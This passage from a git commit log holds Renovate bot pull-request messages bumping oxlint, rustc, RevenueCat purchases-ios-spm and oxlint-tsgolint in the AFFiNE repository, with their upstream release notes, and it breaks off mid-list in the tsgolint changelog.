This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.58.0` → `1.66.0`](https://renovatebot.com/diffs/npm/oxlint/1.58.0/1.66.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/oxc (oxlint)</summary> ### [`v1.66.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1660---2026-05-18) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.65.0...oxlint_v1.66.0) ##### 🚀 Features - [`0440b0f`](https://redirect.github.com/oxc-project/oxc/commit/0440b0f) linter/eslint: Implement `id-match` rule ([#​22379](https://redirect.github.com/oxc-project/oxc/issues/22379)) (Vladislav Sayapin) - [`65bf119`](https://redirect.github.com/oxc-project/oxc/commit/65bf119) linter: Implement react no-object-type-as-default-prop ([#​22481](https://redirect.github.com/oxc-project/oxc/issues/22481)) (uhyo) - [`2a6ddce`](https://redirect.github.com/oxc-project/oxc/commit/2a6ddce) linter/eslint: Implement `no-implied-eval` rule ([#​22391](https://redirect.github.com/oxc-project/oxc/issues/22391)) (Vladislav Sayapin) - [`625758a`](https://redirect.github.com/oxc-project/oxc/commit/625758a) linter/vitest: Implement padding-around-after-all-blocks rule ([#​21788](https://redirect.github.com/oxc-project/oxc/issues/21788)) (kapobajza) - [`37680b0`](https://redirect.github.com/oxc-project/oxc/commit/37680b0) linter: Implement react no-unstable-nested-components ([#​22248](https://redirect.github.com/oxc-project/oxc/issues/22248)) (Jovi De Croock) - [`d8d9c74`](https://redirect.github.com/oxc-project/oxc/commit/d8d9c74) linter: Implement import/newline-after-import rule ([#​19142](https://redirect.github.com/oxc-project/oxc/issues/19142)) (Ryuya Yanagi) ### [`v1.65.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1650---2026-05-15) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.64.0...oxlint_v1.65.0) ##### 🚀 Features - [`5478fb5`](https://redirect.github.com/oxc-project/oxc/commit/5478fb5) linter/jsdoc: Implement `require-throws-description` rule ([#​22386](https://redirect.github.com/oxc-project/oxc/issues/22386)) (Mikhail Baev) - [`c73225e`](https://redirect.github.com/oxc-project/oxc/commit/c73225e) linter/eslint: Implement `prefer-arrow-callback` rule ([#​22312](https://redirect.github.com/oxc-project/oxc/issues/22312)) (박천(Cheon Park)) - [`de82b59`](https://redirect.github.com/oxc-project/oxc/commit/de82b59) linter: Add support for `eslint-plugin-jsx-a11y-x` ([#​22356](https://redirect.github.com/oxc-project/oxc/issues/22356)) (mehm8128) - [`f44b6c8`](https://redirect.github.com/oxc-project/oxc/commit/f44b6c8) linter: Fill schemas `DummyRuleMap` with built-in rules ([#​22288](https://redirect.github.com/oxc-project/oxc/issues/22288)) (Sysix) ### [`v1.64.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1640---2026-05-11) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.63.0...oxlint_v1.64.0) ##### 🚀 Features - [`fbb8f22`](https://redirect.github.com/oxc-project/oxc/commit/fbb8f22) linter: Support `ignores` in overrides ([#​22148](https://redirect.github.com/oxc-project/oxc/issues/22148)) (camc314) ##### 🐛 Bug Fixes - [`25b7017`](https://redirect.github.com/oxc-project/oxc/commit/25b7017) linter: Undocument override `ignores` option ([#​22213](https://redirect.github.com/oxc-project/oxc/issues/22213)) (camc314) ### [`v1.63.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1630---2026-05-05) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.62.0...oxlint_v1.63.0) ##### 📚 Documentation - [`cacbc4a`](https://redirect.github.com/oxc-project/oxc/commit/cacbc4a) linter: Fix jest settings docs. ([#​22127](https://redirect.github.com/oxc-project/oxc/issues/22127)) (connorshea) ### [`v1.62.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1620---2026-04-27) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/7a75f0d0555ee8e5012874eeb3f06f7272804e37...oxlint_v1.62.0) ##### 🚀 Features - [`348f46c`](https://redirect.github.com/oxc-project/oxc/commit/348f46c) linter: Add `respectEslintDisableDirectives` option ([#​21384](https://redirect.github.com/oxc-project/oxc/issues/21384)) (Christian Vuerings) ##### 🐛 Bug Fixes - [`8c425db`](https://redirect.github.com/oxc-project/oxc/commit/8c425db) linter: Allow string for jest version in config schema ([#​21649](https://redirect.github.com/oxc-project/oxc/issues/21649)) (camc314) ### [`v1.61.1`](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.61.0...7a75f0d0555ee8e5012874eeb3f06f7272804e37) ### [`v1.61.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1610---2026-04-20) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.60.0...oxlint_v1.61.0) ##### 🚀 Features - [`38d8090`](https://redirect.github.com/oxc-project/oxc/commit/38d8090) linter/jest: Implemented jest `version` settings in config file. ([#​21522](https://redirect.github.com/oxc-project/oxc/issues/21522)) (Said Atrahouch) ### [`v1.60.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1600---2026-04-13) [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.59.0...oxlint_v1.60.0) ##### 📚 Documentation - [`cfd8a4f`](https://redirect.github.com/oxc-project/oxc/commit/cfd8a4f) linter: Don't rely on old eslint doc for available globals ([#​21334](https://redirect.github.com/oxc-project/oxc/issues/21334)) (Nicolas Le Cam) ### [`v1.59.0`]() [Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.58.0...oxlint_v1.59.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzkuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
4f0d9aff30 |
chore: bump up rustc version to v1.95.0 (#15009)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [rustc](https://redirect.github.com/rust-lang/rust) | minor | `1.94.0` → `1.95.0` | --- ### Release Notes <details> <summary>rust-lang/rust (rustc)</summary> ### [`v1.95.0`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1950-2026-04-16) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.94.1...1.95.0) \=========================== <a id="1.95-Language"></a> ## Language - [Stabilize `if let` guards on match arms](https://redirect.github.com/rust-lang/rust/pull/141295) - [`irrefutable_let_patterns` lint no longer lints on let chains](https://redirect.github.com/rust-lang/rust/pull/146832) - [Support importing path-segment keywords with renaming](https://redirect.github.com/rust-lang/rust/pull/146972) - [Stabilize inline assembly for PowerPC and PowerPC64](https://redirect.github.com/rust-lang/rust/pull/147996) - [const-eval: be more consistent in the behavior of padding during typed copies](https://redirect.github.com/rust-lang/rust/pull/148967) - [Const blocks are no longer evaluated to determine if expressions involving fallible operations can implicitly be constant-promoted.](https://redirect.github.com/rust-lang/rust/pull/150557). Expressions whose ability to implicitly be promoted would depend on the result of a const block are no longer implicitly promoted. - [Make operational semantics of pattern matching independent of crate and module](https://redirect.github.com/rust-lang/rust/pull/150681) <a id="1.95-Compiler"></a> ## Compiler - [Stabilize `--remap-path-scope` for controlling the scoping of how paths get remapped in the resulting binary](https://redirect.github.com/rust-lang/rust/pull/147611) - [Apply patches for CVE-2026-6042 and CVE-2026-40200 to vendored musl](https://redirect.github.com/rust-lang/rust/pull/155171) <a id="1.95-Platform-Support"></a> ## Platform Support - [Promote `powerpc64-unknown-linux-musl` to Tier 2 with host tools](https://redirect.github.com/rust-lang/rust/pull/149962) - [Promote `aarch64-apple-tvos` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) - [Promote `aarch64-apple-tvos-sim` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) - [Promote `aarch64-apple-watchos` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) - [Promote `aarch64-apple-watchos-sim` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) - [Promote `aarch64-apple-visionos` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) - [Promote `aarch64-apple-visionos-sim` to Tier 2](https://redirect.github.com/rust-lang/rust/pull/152021) Refer to Rust's [platform support page][platform-support-doc] for more information on Rust's tiered platform support. [platform-support-doc]: https://doc.rust-lang.org/rustc/platform-support.html <a id="1.95-Libraries"></a> ## Libraries - [`thread::scope`: document how join interacts with TLS destructors](https://redirect.github.com/rust-lang/rust/pull/149482) - [Speed up `str::contains` on aarch64 targets with `neon` target feature enabled by default](https://redirect.github.com/rust-lang/rust/pull/152176) <a id="1.95-Stabilized-APIs"></a> ## Stabilized APIs - [`MaybeUninit<[T; N]>: From<[MaybeUninit<T>; N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3CMaybeUninit%3C%5BT;+N%5D%3E%3E-for-%5BMaybeUninit%3CT%3E;+N%5D) - [`MaybeUninit<[T; N]>: AsRef<[MaybeUninit<T>; N]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E) - [`MaybeUninit<[T; N]>: AsRef<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsRef%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E) - [`MaybeUninit<[T; N]>: AsMut<[MaybeUninit<T>; N]>`](https://doc.rust-lang.org/beta/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E) - [`MaybeUninit<[T; N]>: AsMut<[MaybeUninit<T>]>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-AsMut%3C%5BMaybeUninit%3CT%3E%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E) - [`[MaybeUninit<T>; N]: From<MaybeUninit<[T; N]>>`](https://doc.rust-lang.org/stable/std/mem/union.MaybeUninit.html#impl-From%3C%5BMaybeUninit%3CT%3E;+N%5D%3E-for-MaybeUninit%3C%5BT;+N%5D%3E) - [`Cell<[T; N]>: AsRef<[Cell<T>; N]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E;+N%5D%3E-for-Cell%3C%5BT;+N%5D%3E) - [`Cell<[T; N]>: AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT;+N%5D%3E) - [`Cell<[T]>: AsRef<[Cell<T>]>`](https://doc.rust-lang.org/stable/std/cell/struct.Cell.html#impl-AsRef%3C%5BCell%3CT%3E%5D%3E-for-Cell%3C%5BT%5D%3E) - [`bool: TryFrom<{integer}>`](https://doc.rust-lang.org/stable/std/primitive.bool.html#impl-TryFrom%3Cu128%3E-for-bool) - [`AtomicPtr::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.update) - [`AtomicPtr::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicPtr.html#method.try_update) - [`AtomicBool::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.update) - [`AtomicBool::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicBool.html#method.try_update) - [`AtomicIn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.update) - [`AtomicIn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicIsize.html#method.try_update) - [`AtomicUn::update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.update) - [`AtomicUn::try_update`](https://doc.rust-lang.org/stable/std/sync/atomic/struct.AtomicUsize.html#method.try_update) - [`cfg_select!`](https://doc.rust-lang.org/stable/std/macro.cfg_select.html) - [`mod core::range`](https://doc.rust-lang.org/stable/core/range/index.html) - [`core::range::RangeInclusive`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusive.html) - [`core::range::RangeInclusiveIter`](https://doc.rust-lang.org/stable/core/range/struct.RangeInclusiveIter.html) - [`core::hint::cold_path`](https://doc.rust-lang.org/stable/core/hint/fn.cold_path.html) - [`<*const T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked) - [`<*mut T>::as_ref_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_ref_unchecked-1) - [`<*mut T>::as_mut_unchecked`](https://doc.rust-lang.org/stable/std/primitive.pointer.html#method.as_mut_unchecked) - [`Vec::push_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.push_mut) - [`Vec::insert_mut`](https://doc.rust-lang.org/stable/std/vec/struct.Vec.html#method.insert_mut) - [`VecDeque::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_front_mut) - [`VecDeque::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.push_back_mut) - [`VecDeque::insert_mut`](https://doc.rust-lang.org/stable/std/collections/struct.VecDeque.html#method.insert_mut) - [`LinkedList::push_front_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_front_mut) - [`LinkedList::push_back_mut`](https://doc.rust-lang.org/stable/std/collections/struct.LinkedList.html#method.push_back_mut) - [`Layout::dangling_ptr`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.dangling_ptr) - [`Layout::repeat`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat) - [`Layout::repeat_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.repeat_packed) - [`Layout::extend_packed`](https://doc.rust-lang.org/stable/std/alloc/struct.Layout.html#method.extend_packed) These previously stable APIs are now stable in const contexts: - [`fmt::from_fn`](https://doc.rust-lang.org/stable/std/fmt/fn.from_fn.html) - [`ControlFlow::is_break`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_break) - [`ControlFlow::is_continue`](https://doc.rust-lang.org/stable/core/ops/enum.ControlFlow.html#method.is_continue) <a id="1.95-Rustdoc"></a> ## Rustdoc - [In search results, rank unstable items lower](https://redirect.github.com/rust-lang/rust/pull/149460) - [Add new "hide deprecated items" setting in rustdoc](https://redirect.github.com/rust-lang/rust/pull/151091) <a id="1.95-Compatibility-Notes"></a> ## Compatibility Notes - [Array coercions may now result in less inference constraints than before](https://redirect.github.com/rust-lang/rust/pull/140283) - Importing `$crate` without renaming, i.e. `use $crate::{self};`, is now no longer permitted due to stricter error checking for `self` imports. - [const-eval: be more consistent in the behavior of padding during typed copies.](https://redirect.github.com/rust-lang/rust/pull/148967) In very rare cases, this may cause compilation errors due to bytes from parts of a pointer ending up in the padding bytes of a `const` or `static`. - [A future-incompatibility warning lint `ambiguous_glob_imported_traits` is now reported when using an ambiguously glob imported trait](https://redirect.github.com/rust-lang/rust/pull/149058) - [Check lifetime bounds of types mentioning only type parameters](https://redirect.github.com/rust-lang/rust/pull/149389) - [Report more visibility-related ambiguous import errors](https://redirect.github.com/rust-lang/rust/pull/149596) - [Deprecate `Eq::assert_receiver_is_total_eq` and emit future compatibility warnings on manual impls](https://redirect.github.com/rust-lang/rust/pull/149978) - [powerpc64: Use the ELF ABI version set in target spec instead of guessing](https://redirect.github.com/rust-lang/rust/pull/150468) (fixes the ELF ABI used by the OpenBSD target) - Matching on a `#[non_exhaustive]` enum [now reads the discriminant, even if the enum has only one variant](https://redirect.github.com/rust-lang/rust/pull/150681). This can cause closures to capture values that they previously wouldn't. - `mut ref` and `mut ref mut` patterns, part of the unstable [Match Ergonomics 2024 RFC](https://redirect.github.com/rust-lang/rust/issues/123076), were accidentally allowed on stable within struct pattern field shorthand. These patterns are now correctly feature-gated as unstable in this position. - [Add future-compatibility warning for derive helper attributes which conflict with built-in attributes](https://redirect.github.com/rust-lang/rust/pull/151152) - [JSON target specs](https://doc.rust-lang.org/rustc/targets/custom.html) have been destabilized and now require `-Z unstable-options` to use. Previously, they could not be used without the standard library, which has no stable build mechanism. In preparation for the `build-std` project adding that support, JSON target specs are being proactively gated to ensure they remain unstable even if `build-std` is stabilized. Cargo now includes the `-Z json-target-spec` CLI flag to automatically pass `-Z unstable-options` to the compiler when needed. See [#​150151](https://redirect.github.com/rust-lang/rust/pull/150151), [#​151534](https://redirect.github.com/rust-lang/rust/pull/150151), and [rust-lang/cargo#16557](https://redirect.github.com/rust-lang/cargo/pull/16557). - [The arguments of `#[feature]` attributes on invalid targets are now checked](https://redirect.github.com/rust-lang/rust/issues/153764) <a id="1.95-Internal-Changes"></a> ## Internal Changes These changes do not affect any public interfaces of Rust, but they represent significant improvements to the performance or internals of rustc and related tools. - [Update to LLVM 22](https://redirect.github.com/rust-lang/rust/pull/150722) ### [`v1.94.1`](https://redirect.github.com/rust-lang/rust/blob/HEAD/RELEASES.md#Version-1941-2026-03-26) [Compare Source](https://redirect.github.com/rust-lang/rust/compare/1.94.0...1.94.1) \=========================== <a id="1.94.1"></a> - [Fix `std::thread::spawn` on wasm32-wasip1-threads](https://redirect.github.com/rust-lang/rust/pull/153634) - [Remove new methods added to `std::os::windows::fs::OpenOptionsExt`](https://redirect.github.com/rust-lang/rust/pull/153491) The new methods were unstable, but the trait itself is not sealed and so cannot be extended with non-default methods. - [Clippy: fix ICE in `match_same_arms`](https://redirect.github.com/rust-lang/rust-clippy/pull/16685) - [Cargo: update tar to 0.4.45](https://redirect.github.com/rust-lang/cargo/pull/16769) This resolves CVE-2026-33055 and CVE-2026-33056. Users of crates.io are not affected. See [blog](https://blog.rust-lang.org/2026/03/21/cve-2026-33056/) for more details. </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
41145961f9 |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.73.0" (#15008)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.66.0"` → `from: "5.73.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.73.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5730) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.72.0...5.73.0) #### 5.73.0 ### [`v5.72.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5720) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.71.0...5.72.0) #### 5.72.0 ### [`v5.71.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5710) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.70.0...5.71.0) #### 5.71.0 ### [`v5.70.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5700) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.69.0...5.70.0) #### 5.70.0 ### [`v5.69.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5690) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.68.0...5.69.0) #### 5.69.0 ### [`v5.68.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5680) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.2...5.68.0) #### 5.68.0 ### [`v5.67.2`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5672) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.1...5.67.2) #### 5.67.2 ### [`v5.67.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5671) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.67.0...5.67.1) #### 5.67.1 ### [`v5.67.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5670) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.66.0...5.67.0) #### 5.67.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xODUuMSIsInVwZGF0ZWRJblZlciI6IjQzLjE4NS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
6e97aff7ba |
chore: bump up oxlint-tsgolint version to ^0.23.0 (#15007)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [oxlint-tsgolint](https://redirect.github.com/oxc-project/tsgolint) | [`^0.19.0` → `^0.23.0`](https://renovatebot.com/diffs/npm/oxlint-tsgolint/0.19.0/0.23.0) |  |  | --- ### Release Notes <details> <summary>oxc-project/tsgolint (oxlint-tsgolint)</summary> ### [`v0.23.0`](https://redirect.github.com/oxc-project/tsgolint/releases/tag/v0.23.0) [Compare Source](https://redirect.github.com/oxc-project/tsgolint/compare/v0.22.1...v0.23.0) #### What's Changed - chore(deps): update crate-ci/typos action to v1.45.2 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​915](https://redirect.github.com/oxc-project/tsgolint/pull/915) - feat: add skill for upgrading typescript-go by [@​camc314](https://redirect.github.com/camc314) in [#​918](https://redirect.github.com/oxc-project/tsgolint/pull/918) - chore(deps): update pnpm to v10.33.2 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​921](https://redirect.github.com/oxc-project/tsgolint/pull/921) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​922](https://redirect.github.com/oxc-project/tsgolint/pull/922) - fix: attach tsconfig path to diagnostics by [@​camc314](https://redirect.github.com/camc314) in [#​923](https://redirect.github.com/oxc-project/tsgolint/pull/923) - fix(prefer-nullish-coalescing): parenthesize mixed logical fixes by [@​camc314](https://redirect.github.com/camc314) in [#​924](https://redirect.github.com/oxc-project/tsgolint/pull/924) - tests(return-await): cover non-async arrow functions by [@​camc314](https://redirect.github.com/camc314) in [#​926](https://redirect.github.com/oxc-project/tsgolint/pull/926) - chore(deps): update github.com/go-json-experiment/json digest to [`b6187a3`](https://redirect.github.com/oxc-project/tsgolint/commit/b6187a3) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​927](https://redirect.github.com/oxc-project/tsgolint/pull/927) - chore(deps): update github actions by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​928](https://redirect.github.com/oxc-project/tsgolint/pull/928) - chore(deps): update crate-ci/typos action to v1.46.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​929](https://redirect.github.com/oxc-project/tsgolint/pull/929) - chore(deps): update module github.com/dlclark/regexp2 to v2 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​930](https://redirect.github.com/oxc-project/tsgolint/pull/930) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​931](https://redirect.github.com/oxc-project/tsgolint/pull/931) - chore(deps): update typescript-go digest to [`48e2953`](https://redirect.github.com/oxc-project/tsgolint/commit/48e2953) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​933](https://redirect.github.com/oxc-project/tsgolint/pull/933) - chore(deps): update typescript-go digest to [`5eb880f`](https://redirect.github.com/oxc-project/tsgolint/commit/5eb880f) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​936](https://redirect.github.com/oxc-project/tsgolint/pull/936) - fix(no-misused-promises): handle empty JSX attributes by [@​camc314](https://redirect.github.com/camc314) in [#​938](https://redirect.github.com/oxc-project/tsgolint/pull/938) - fix(no-unsafe-enum-comparison): flag string literal unions by [@​camc314](https://redirect.github.com/camc314) in [#​937](https://redirect.github.com/oxc-project/tsgolint/pull/937) - chore(deps): update typescript-go digest to [`e1f8f97`](https://redirect.github.com/oxc-project/tsgolint/commit/e1f8f97) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​939](https://redirect.github.com/oxc-project/tsgolint/pull/939) - chore(deps): update typescript-go digest to [`092b34f`](https://redirect.github.com/oxc-project/tsgolint/commit/092b34f) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​940](https://redirect.github.com/oxc-project/tsgolint/pull/940) - chore: configure typescript-go renovate schedule by [@​camc314](https://redirect.github.com/camc314) in [#​941](https://redirect.github.com/oxc-project/tsgolint/pull/941) - chore(deps): update github actions by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​945](https://redirect.github.com/oxc-project/tsgolint/pull/945) - chore(deps): update dependency dprint-typescript to v0.96.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​947](https://redirect.github.com/oxc-project/tsgolint/pull/947) - chore(deps): update gomod by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​946](https://redirect.github.com/oxc-project/tsgolint/pull/946) - chore(deps): update crate-ci/typos action to v1.46.1 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​948](https://redirect.github.com/oxc-project/tsgolint/pull/948) - fix(prefer-nullish-coalescing): emit suggestion over fix by [@​camc314](https://redirect.github.com/camc314) in [#​951](https://redirect.github.com/oxc-project/tsgolint/pull/951) - chore: update packageManager to pnpm 11.0.4 by [@​Boshen](https://redirect.github.com/Boshen) in [#​953](https://redirect.github.com/oxc-project/tsgolint/pull/953) - chore: update typescript-go submodule by [@​camc314](https://redirect.github.com/camc314) in [#​955](https://redirect.github.com/oxc-project/tsgolint/pull/955) - fix(no-nullable-type-assertion-style): use suggestion instead of fix by [@​camc314](https://redirect.github.com/camc314) in [#​956](https://redirect.github.com/oxc-project/tsgolint/pull/956) - docs: Update Go version requirement to 1.26 in CONTRIBUTING.md. by [@​connorshea](https://redirect.github.com/connorshea) in [#​957](https://redirect.github.com/oxc-project/tsgolint/pull/957) - fix: allow safe promise intersection members by [@​camc314](https://redirect.github.com/camc314) in [#​959](https://redirect.github.com/oxc-project/tsgolint/pull/959) - ci: switch security workflow to ubuntu-latest by [@​Boshen](https://redirect.github.com/Boshen) in [#​962](https://redirect.github.com/oxc-project/tsgolint/pull/962) - chore(deps): update dependency vitest to v4.1.6 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​963](https://redirect.github.com/oxc-project/tsgolint/pull/963) - chore(deps): update module github.com/dlclark/regexp2/v2 to v2.0.3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​964](https://redirect.github.com/oxc-project/tsgolint/pull/964) - chore(deps): update dependency dprint-markdown to v0.22.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​965](https://redirect.github.com/oxc-project/tsgolint/pull/965) - chore(deps): update github actions by 